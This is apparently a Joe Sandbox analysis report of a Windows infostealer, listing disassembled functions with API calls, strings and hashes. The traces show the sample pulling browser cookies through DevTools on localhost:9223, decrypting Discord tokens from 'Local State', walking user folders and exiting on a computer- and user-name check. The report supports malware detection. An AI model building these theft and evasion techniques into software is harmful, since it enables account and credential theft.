                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%APPDATA%,00000000,?,0000001A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130DA
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%LOCALAPPDATA%,00000000,?,0000001C,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413106
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%USERPROFILE%,00000000,?,00000028,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413132
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%DOCUMENTS%,00000000,?,00000005,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES%,00000000,?,00000026,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041318A
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES_86%,00000000,?,0000002A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131B6
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%RECENT%,00000000,?,00000008,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131E2
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,true,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00413268
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,false,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041327D
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0041301C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$strtok_s$FolderPathlstrlen
                                                                                                                                                                                                                                                                                • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                • API String ID: 1330363096-2422389115
                                                                                                                                                                                                                                                                                • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                                Function 00406AA0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 416COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                                • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                                • Opcode ID: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                                Function 004132F0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                • String ID: block$|
                                                                                                                                                                                                                                                                                • API String ID: 3407564107-542838162
                                                                                                                                                                                                                                                                                • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                                Function 0041D0C0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 67stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                                                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                                • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                                • Opcode ID: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                • Instruction ID: 393e261fe4cb7b69f2f042267bc96a23e416e0ea17d9edbe6cd76d0812bafa5d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C11BFB0B416227B9B325B745C48FEB6BE8AF15B40B990037F401E2171EB5CD8C286AD
                                                                                                                                                                                                                                                                                Function 00401090 Relevance: 27.1, APIs: 18, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004010A8
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                                • Opcode ID: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                • Instruction ID: 34afd6592ec8d0e6f1858942ae0d643bae2899fd03f8c159827732ad67307064
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8113CA57813283AE12132223DC7FBF159C9F92BD9F90012AFA04740C3AA9DDD4650FE
                                                                                                                                                                                                                                                                                Function 004153A0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 252stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415403
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\discord\), ref: 00415415
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415423
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,Local State), ref: 0041542F
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004078F0: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                  • Part of subcall function 004078F0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411C00: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041552D,?,?,?), ref: 00411C0B
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,dQw4w9WgXcQ,?,?,?), ref: 00415535
                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0041568B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407790: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 004077CF
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042150A), ref: 00415659
